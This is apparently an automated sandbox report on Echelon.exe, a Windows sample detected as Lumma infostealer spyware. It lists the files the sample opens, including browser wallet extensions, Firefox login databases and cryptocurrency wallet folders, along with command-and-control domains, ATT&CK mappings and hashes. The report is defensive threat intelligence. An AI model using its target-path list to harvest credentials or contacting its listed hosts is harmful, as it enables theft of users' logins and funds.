              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
              Source: C:\Users\user\Desktop\Echelon.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2250780193.0000000001669000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Echelon.exe PID: 3356, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: Echelon.exe PID: 3356, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              Query Registry
              Remote Services41
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              DLL Side-Loading
              LSASS Memory121
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager11
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
              Process Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials22
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Echelon.exe58%VirustotalBrowse
              Echelon.exe50%ReversingLabsWin32.Spyware.Lummastealer
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              erectystickj.click
              172.67.154.166
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                dare-curbys.bizfalse
                  high
                  impend-differ.bizfalse
                    high
                    covery-mover.bizfalse
                      high
                      https://erectystickj.click/apitrue
                        unknown
                        dwell-exclaim.bizfalse
                          high
                          erectystickj.clicktrue
                            unknown
                            zinc-sneark.bizfalse
                              high
                              formy-spill.bizfalse
                                high
                                se-blurry.bizfalse
                                  high
                                  print-vexer.bizfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabEchelon.exe, 00000000.00000003.2165923311.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166022329.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165845157.00000000044BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=Echelon.exe, 00000000.00000003.2165923311.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166022329.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165845157.00000000044BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoEchelon.exe, 00000000.00000003.2165923311.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166022329.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165845157.00000000044BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Echelon.exe, 00000000.00000003.2165923311.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166022329.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165845157.00000000044BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.rootca1.amazontrust.com/rootca1.crl0Echelon.exe, 00000000.00000003.2212206179.000000000458D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Echelon.exe, 00000000.00000003.2165923311.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166022329.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165845157.00000000044BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://ocsp.rootca1.amazontrust.com0:Echelon.exe, 00000000.00000003.2212206179.000000000458D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.ecosia.org/newtab/Echelon.exe, 00000000.00000003.2165923311.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166022329.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165845157.00000000044BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brEchelon.exe, 00000000.00000003.2218270643.00000000047AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://erectystickj.click/jEchelon.exe, 00000000.00000003.2317978549.000000000164F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://ac.ecosia.org/autocomplete?q=Echelon.exe, 00000000.00000003.2165923311.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166022329.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165845157.00000000044BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crl.microEchelon.exe, 00000000.00000003.2277367726.000000000163D000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2317978549.0000000001648000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://x1.c.lencr.org/0Echelon.exe, 00000000.00000003.2212206179.000000000458D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://x1.i.lencr.org/0Echelon.exe, 00000000.00000003.2212206179.000000000458D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://erectystickj.click/apiZKEchelon.exe, 00000000.00000002.2322552088.000000000450A000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2276225371.000000000450A000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2280744837.000000000450A000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2293376252.000000000450A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchEchelon.exe, 00000000.00000003.2165923311.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166022329.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165845157.00000000044BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?Echelon.exe, 00000000.00000003.2212206179.000000000458D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://erectystickj.click/Echelon.exe, 00000000.00000003.2277367726.000000000164F000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2276635790.000000000166E000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000002.2321403698.000000000164F000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2317978549.000000000164F000.00000004.00000020.00020000.00000000.sdmp, Echelon.exe, 00000000.00000002.2321403698.00000000015F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://www.lokibit.comEchelon.exefalse
                                                                          unknown
                                                                          https://erectystickj.click/api3KEchelon.exe, 00000000.00000003.2241658270.0000000004508000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2241853994.0000000004508000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2241744012.0000000004508000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2244207712.000000000450A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://support.mozilla.org/products/firefoxgro.allEchelon.exe, 00000000.00000003.2218270643.00000000047AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Echelon.exe, 00000000.00000003.2165923311.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2166022329.00000000044B7000.00000004.00000800.00020000.00000000.sdmp, Echelon.exe, 00000000.00000003.2165845157.00000000044BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://erectystickj.click:443/apiEchelon.exe, 00000000.00000003.2294045335.000000000165F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  172.67.154.166
                                                                                  erectystickj.clickUnited States
                                                                                  13335CLOUDFLARENETUStrue
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1579580
                                                                                  Start date and time:2024-12-23 02:28:11 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 6m 15s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:4
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:Echelon.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                  EGA Information:Failed
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  • Number of executed functions: 0
                                                                                  • Number of non-executed functions: 0
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  TimeTypeDescription
                                                                                  20:29:11API Interceptor8x Sleep call for process: Echelon.exe modified
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  172.67.154.166Millich Law.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                    https://docs-paymentreceipts.infoGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                      No context
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      CLOUDFLARENETUSNeverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.157.254
                                                                                      setup.msiGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.65.145
                                                                                      bas.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.71.155
                                                                                      Wine.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.50.161
                                                                                      tg.exeGet hashmaliciousBabadedaBrowse
                                                                                      • 172.67.74.152
                                                                                      Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.157.254
                                                                                      tg.exeGet hashmaliciousBabadedaBrowse
                                                                                      • 104.26.12.205
                                                                                      setup.exeGet hashmaliciousBabadedaBrowse
                                                                                      • 104.26.13.205
                                                                                      AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                      • 104.21.80.1
                                                                                      WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.66.86
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      a0e9f5d64349fb13191bc781f81f42e1Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.154.166
                                                                                      bas.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.154.166
                                                                                      Wine.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.154.166
                                                                                      Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.154.166
                                                                                      AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                      • 172.67.154.166
                                                                                      WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.154.166
                                                                                      external.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.154.166
                                                                                      Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.154.166
                                                                                      Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.154.166
                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.154.166
                                                                                      No context
                                                                                      No created / dropped files found
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):6.935156866043373
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 98.39%
                                                                                      • Windows ActiveX control (116523/4) 1.15%
                                                                                      • InstallShield setup (43055/19) 0.42%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      File name:Echelon.exe
                                                                                      File size:6'689'112 bytes
                                                                                      MD5:cbdef49d32cf66bfa4c8a86d225b11bd
                                                                                      SHA1:bc2ce52834c6a615a8bd5d3b6aafd25239d03b44
                                                                                      SHA256:4e6c7876342928a4ca103e27e2a0823c0e8df2457ba32e5d62fcf94cb111a477
                                                                                      SHA512:84c6a436250dc12c2055c75abd318c07408c314388ac3c3209d22985955cb2d1cc9e916f29fb10d9257cb3d995a72cf91be83258e3151b6a0eda36125b831adb
                                                                                      SSDEEP:196608:YkywgD6ytCV8NxxKQP8v0ojDIg9Cbk/V8e:pyp621P8vXDd
                                                                                      TLSH:56666D756E7981E2F48A0170DAAA393F9469CC28373920D7D6D71A28F5F06E1C435E2F
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........M..b...b...b.......b..B....b..B....b..B..N.b...c...b.......b.......b..B....b..B....b..B....b.Rich..b.........PE..L....H.T...
                                                                                      Icon Hash:133171d6ccccc244
                                                                                      Entrypoint:0x576f94
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:true
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x54834815 [Sat Dec 6 18:16:53 2014 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:72ac408540f41dba76edd212bbe5c62f
                                                                                      Signature Valid:false
                                                                                      Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                      Error Number:-2146869232
                                                                                      Not Before, Not After
                                                                                      • 16/10/2024 03:05:06 17/10/2026 03:05:06
                                                                                      Subject Chain
                                                                                      • E=info@remoteutilities.com, CN=REMOTE UTILITIES PTE. LTD., O=REMOTE UTILITIES PTE. LTD., L=Singapore, S=Singapore, C=SG, OID.1.3.6.1.4.1.311.60.2.1.3=SG, SERIALNUMBER=202431257D, OID.2.5.4.15=Private Organization
                                                                                      Version:3
                                                                                      Thumbprint MD5:EA9E05EDB1D06F8328320FE2B652C61F
                                                                                      Thumbprint SHA-1:902CC2BB628B651954A5F7A1D68C6CDE84707A54
                                                                                      Thumbprint SHA-256:695F7336E0350F311E1C4B8BA978EBEB2617C21980B9A66CDF94BEDC9574F6BC
                                                                                      Serial:1B17B4C6100E7FD4156C5F01
                                                                                      Instruction
                                                                                      call 00007F7340E68AF4h
                                                                                      jmp 00007F7340E6111Eh
                                                                                      cmp ecx, dword ptr [0083AFA0h]
                                                                                      jne 00007F7340E61294h
                                                                                      rep ret
                                                                                      jmp 00007F7340E68B7Bh
                                                                                      mov edi, edi
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      xor eax, eax
                                                                                      cmp dword ptr [ebp+0Ch], eax
                                                                                      jbe 00007F7340E612A4h
                                                                                      mov ecx, dword ptr [ebp+08h]
                                                                                      cmp word ptr [ecx], 0000h
                                                                                      je 00007F7340E6129Bh
                                                                                      inc eax
                                                                                      add ecx, 02h
                                                                                      cmp eax, dword ptr [ebp+0Ch]
                                                                                      jc 00007F7340E61283h
                                                                                      pop ebp
                                                                                      ret
